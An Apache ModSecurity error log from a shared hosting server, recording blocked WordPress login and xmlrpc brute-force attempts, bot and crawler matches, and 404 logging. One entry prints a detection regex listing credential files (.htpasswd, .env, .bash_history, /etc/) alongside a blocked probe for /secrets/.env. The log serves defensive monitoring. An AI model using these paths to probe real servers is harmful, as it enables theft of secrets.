[Tue May 26 16:00:34.762997 2026] [security2:error] [pid 762634:tid 762767] [client 103.44.52.196:51302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Srx8rj1VZMqUAOdsiQAAAAM"]
[Tue May 26 16:00:34.763097 2026] [security2:error] [pid 762634:tid 762767] [client 103.44.52.196:51302] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Srx8rj1VZMqUAOdsiQAAAAM"]
[Tue May 26 16:00:35.155003 2026] [security2:error] [pid 762634:tid 762766] [client 62.60.130.233:51407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-login.php"] [unique_id "ahV2S7x8rj1VZMqUAOdskgAAAAI"], referer: https://duckduckgo.com/
[Tue May 26 16:00:35.488128 2026] [security2:error] [pid 762634:tid 762838] [client 62.60.130.233:55497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-login.php"] [unique_id "ahV2S7x8rj1VZMqUAOdsmQAAAEo"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 16:00:36.598709 2026] [security2:error] [pid 762634:tid 762802] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2TLx8rj1VZMqUAOdsuAAAACY"]
[Tue May 26 16:00:37.605672 2026] [security2:error] [pid 762634:tid 762707] [remote 2.57.122.173:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.ndequipments.com"] [uri "/secrets/.env"] [unique_id "ahV2Tbx8rj1VZMqUAOds2wAAIEg"]
[Tue May 26 16:00:38.577639 2026] [security2:error] [pid 762634:tid 762828] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Trx8rj1VZMqUAOds7QAAAEA"]
[Tue May 26 16:00:38.686183 2026] [security2:error] [pid 762634:tid 762787] [client 103.153.130.62:53425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Trx8rj1VZMqUAOds-wAAABc"]
[Tue May 26 16:00:38.686292 2026] [security2:error] [pid 762634:tid 762787] [client 103.153.130.62:53425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Trx8rj1VZMqUAOds-wAAABc"]
[Tue May 26 16:00:39.168816 2026] [security2:error] [pid 762634:tid 762779] [client 74.7.230.40:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.axum-vermogen.eu"] [uri "/cgi-sys/404.html"] [unique_id "ahV2T7x8rj1VZMqUAOdtCgAAAA8"]
[Tue May 26 16:00:39.169714 2026] [security2:error] [pid 762634:tid 762767] [client 74.7.230.40:36224] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.axum-vermogen.eu"] [uri "/robots.txt"] [unique_id "ahV2T7x8rj1VZMqUAOdtCAAAAAM"]
[Tue May 26 16:00:39.832869 2026] [security2:error] [pid 762634:tid 762720] [remote 103.95.119.103:36396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV2T7x8rj1VZMqUAOdtFwAAQ1U"]
[Tue May 26 16:00:40.627505 2026] [security2:error] [pid 762634:tid 762839] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ULx8rj1VZMqUAOdtJAAAAEs"]
[Tue May 26 16:00:42.270372 2026] [security2:error] [pid 762634:tid 762785] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Ubx8rj1VZMqUAOdtRgAAABU"]
[Tue May 26 16:00:43.286729 2026] [security2:error] [pid 762634:tid 762848] [client 106.219.85.83:6872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2U7x8rj1VZMqUAOdtWgAAAFQ"]
[Tue May 26 16:00:43.286876 2026] [security2:error] [pid 762634:tid 762848] [client 106.219.85.83:6872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2U7x8rj1VZMqUAOdtWgAAAFQ"]
[Tue May 26 16:00:43.856091 2026] [security2:error] [pid 762634:tid 762732] [remote 74.7.241.58:52280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV2U7x8rj1VZMqUAOdtcAAALWE"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/.quarantine
[Tue May 26 16:00:44.204977 2026] [security2:error] [pid 762634:tid 762802] [client 175.27.136.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahV2U7x8rj1VZMqUAOdtegAAACY"]
[Tue May 26 16:00:44.290205 2026] [security2:error] [pid 762634:tid 762825] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2U7x8rj1VZMqUAOdtcwAAAD0"]
[Tue May 26 16:00:45.205789 2026] [security2:error] [pid 762634:tid 762857] [client 62.60.130.231:64615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV2Vbx8rj1VZMqUAOdtnAAAAF0"], referer: https://duckduckgo.com/
[Tue May 26 16:00:45.265106 2026] [security2:error] [pid 762634:tid 762860] [client 103.44.52.196:47896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Vbx8rj1VZMqUAOdtqQAAAGA"]
[Tue May 26 16:00:45.265236 2026] [security2:error] [pid 762634:tid 762860] [client 103.44.52.196:47896] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Vbx8rj1VZMqUAOdtqQAAAGA"]
[Tue May 26 16:00:45.543402 2026] [security2:error] [pid 762634:tid 762832] [client 62.60.130.231:63758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV2Vbx8rj1VZMqUAOdtrAAAAEQ"], referer: https://www.bing.com/
[Tue May 26 16:00:46.765529 2026] [security2:error] [pid 762634:tid 762816] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Vrx8rj1VZMqUAOdtyAAAADQ"]
[Tue May 26 16:00:48.035189 2026] [security2:error] [pid 762634:tid 762776] [client 62.60.130.231:59919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV2WLx8rj1VZMqUAOdt-AAAAAw"]
[Tue May 26 16:00:49.059150 2026] [security2:error] [pid 762634:tid 762890] [client 103.153.130.62:53713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Wbx8rj1VZMqUAOduDwAAAH4"]
[Tue May 26 16:00:49.059249 2026] [security2:error] [pid 762634:tid 762890] [client 103.153.130.62:53713] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Wbx8rj1VZMqUAOduDwAAAH4"]
[Tue May 26 16:00:49.176973 2026] [security2:error] [pid 762634:tid 762795] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2WLx8rj1VZMqUAOduCgAAAB8"]
[Tue May 26 16:00:50.988353 2026] [security2:error] [pid 762634:tid 762807] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Wrx8rj1VZMqUAOduMgAAACs"]
[Tue May 26 16:00:52.746473 2026] [security2:error] [pid 762634:tid 762775] [client 69.165.72.57:64255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.72.165.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.yourstorybag.com"] [uri "/index.php"] [unique_id "ahV2XLx8rj1VZMqUAOducwAAAAs"], referer: https://mail.yourstorybag.com
[Tue May 26 16:00:52.889155 2026] [security2:error] [pid 762634:tid 762873] [client 114.119.152.167:63087] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV2XLx8rj1VZMqUAOdueAAAAG0"], referer: http://haddingtonwines.com/cart?remove_item=76c538125fc5c9ec6ad1d05650a57de5
[Tue May 26 16:00:52.892342 2026] [security2:error] [pid 762634:tid 762875] [client 52.28.162.93:25318] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV2XLx8rj1VZMqUAOduYgAAAG8"], referer: https://thegoodsporting.com
[Tue May 26 16:00:52.895792 2026] [security2:error] [pid 762634:tid 762791] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2XLx8rj1VZMqUAOduawAAABs"]
[Tue May 26 16:00:53.731679 2026] [security2:error] [pid 762634:tid 762815] [client 106.219.85.83:29957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Xbx8rj1VZMqUAOdukgAAADM"]
[Tue May 26 16:00:53.732049 2026] [security2:error] [pid 762634:tid 762815] [client 106.219.85.83:29957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Xbx8rj1VZMqUAOdukgAAADM"]
[Tue May 26 16:00:55.057265 2026] [security2:error] [pid 762634:tid 762829] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Xrx8rj1VZMqUAOdurQAAAEE"]
[Tue May 26 16:00:55.494879 2026] [security2:error] [pid 762634:tid 762761] [remote 51.91.98.45:51842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV2X7x8rj1VZMqUAOduuAAADH4"]
[Tue May 26 16:00:56.175199 2026] [security2:error] [pid 762634:tid 762783] [client 103.44.52.196:35098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2YLx8rj1VZMqUAOdu0AAAABM"]
[Tue May 26 16:00:56.175367 2026] [security2:error] [pid 762634:tid 762783] [client 103.44.52.196:35098] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2YLx8rj1VZMqUAOdu0AAAABM"]
[Tue May 26 16:00:56.479154 2026] [security2:error] [pid 762634:tid 762867] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2YLx8rj1VZMqUAOduzwAAAGc"]
[Tue May 26 16:00:57.264178 2026] [security2:error] [pid 762634:tid 762829] [client 68.237.18.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2YLx8rj1VZMqUAOdu5QAAAEE"]
[Tue May 26 16:00:59.172537 2026] [security2:error] [pid 762634:tid 762887] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Yrx8rj1VZMqUAOdvCwAAAHs"]
[Tue May 26 16:00:59.427124 2026] [security2:error] [pid 762634:tid 762766] [client 103.153.130.62:54025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Y7x8rj1VZMqUAOdvHAAAAAI"]
[Tue May 26 16:00:59.427248 2026] [security2:error] [pid 762634:tid 762766] [client 103.153.130.62:54025] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Y7x8rj1VZMqUAOdvHAAAAAI"]
[Tue May 26 16:01:01.146867 2026] [security2:error] [pid 762634:tid 762818] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ZLx8rj1VZMqUAOdvRQAAADY"]
[Tue May 26 16:01:01.185162 2026] [security2:error] [pid 762634:tid 762677] [remote 163.223.13.54:58368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahV2ZLx8rj1VZMqUAOdvSwAAcio"]
[Tue May 26 16:01:02.678730 2026] [security2:error] [pid 762634:tid 762835] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV2Zrx8rj1VZMqUAOdvcwAAAEc"]
[Tue May 26 16:01:02.679151 2026] [security2:error] [pid 762634:tid 762884] [client 106.222.227.47:25492] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV2Zrx8rj1VZMqUAOdvcQAAAHg"]
[Tue May 26 16:01:02.691847 2026] [security2:error] [pid 762634:tid 762684] [remote 94.76.235.103:58542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV2Zrx8rj1VZMqUAOdvagAAXjE"]
[Tue May 26 16:01:03.169735 2026] [security2:error] [pid 762634:tid 762822] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Zrx8rj1VZMqUAOdvdwAAADo"]
[Tue May 26 16:01:04.277415 2026] [security2:error] [pid 762634:tid 762795] [client 106.219.85.83:32122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2aLx8rj1VZMqUAOdvqgAAAB8"]
[Tue May 26 16:01:04.277525 2026] [security2:error] [pid 762634:tid 762795] [client 106.219.85.83:32122] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2aLx8rj1VZMqUAOdvqgAAAB8"]
[Tue May 26 16:01:05.329723 2026] [security2:error] [pid 762634:tid 762837] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2aLx8rj1VZMqUAOdvugAAAEk"]
[Tue May 26 16:01:06.509874 2026] [security2:error] [pid 762634:tid 762779] [client 223.109.252.158:60566] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/"] [unique_id "ahV2arx8rj1VZMqUAOdv6wAAAA8"]
[Tue May 26 16:01:06.509987 2026] [security2:error] [pid 762634:tid 762779] [client 223.109.252.158:60566] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cicodev.org"] [uri "/"] [unique_id "ahV2arx8rj1VZMqUAOdv6wAAAA8"]
[Tue May 26 16:01:06.690267 2026] [security2:error] [pid 762634:tid 762854] [client 103.44.52.196:33272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2arx8rj1VZMqUAOdv7wAAAFo"]
[Tue May 26 16:01:06.690401 2026] [security2:error] [pid 762634:tid 762854] [client 103.44.52.196:33272] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2arx8rj1VZMqUAOdv7wAAAFo"]
[Tue May 26 16:01:06.907738 2026] [security2:error] [pid 762634:tid 762843] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2arx8rj1VZMqUAOdv6gAAAE8"]
[Tue May 26 16:01:09.497841 2026] [security2:error] [pid 762634:tid 762889] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2bbx8rj1VZMqUAOdwHgAAAH0"]
[Tue May 26 16:01:09.908888 2026] [autoindex:error] [pid 762634:tid 762808] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:01:09.931765 2026] [security2:error] [pid 762634:tid 762776] [client 103.153.130.62:54320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2bbx8rj1VZMqUAOdwMQAAAAw"]
[Tue May 26 16:01:09.931889 2026] [security2:error] [pid 762634:tid 762776] [client 103.153.130.62:54320] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2bbx8rj1VZMqUAOdwMQAAAAw"]
[Tue May 26 16:01:11.917916 2026] [security2:error] [pid 762634:tid 762779] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2b7x8rj1VZMqUAOdwXQAAAA8"]
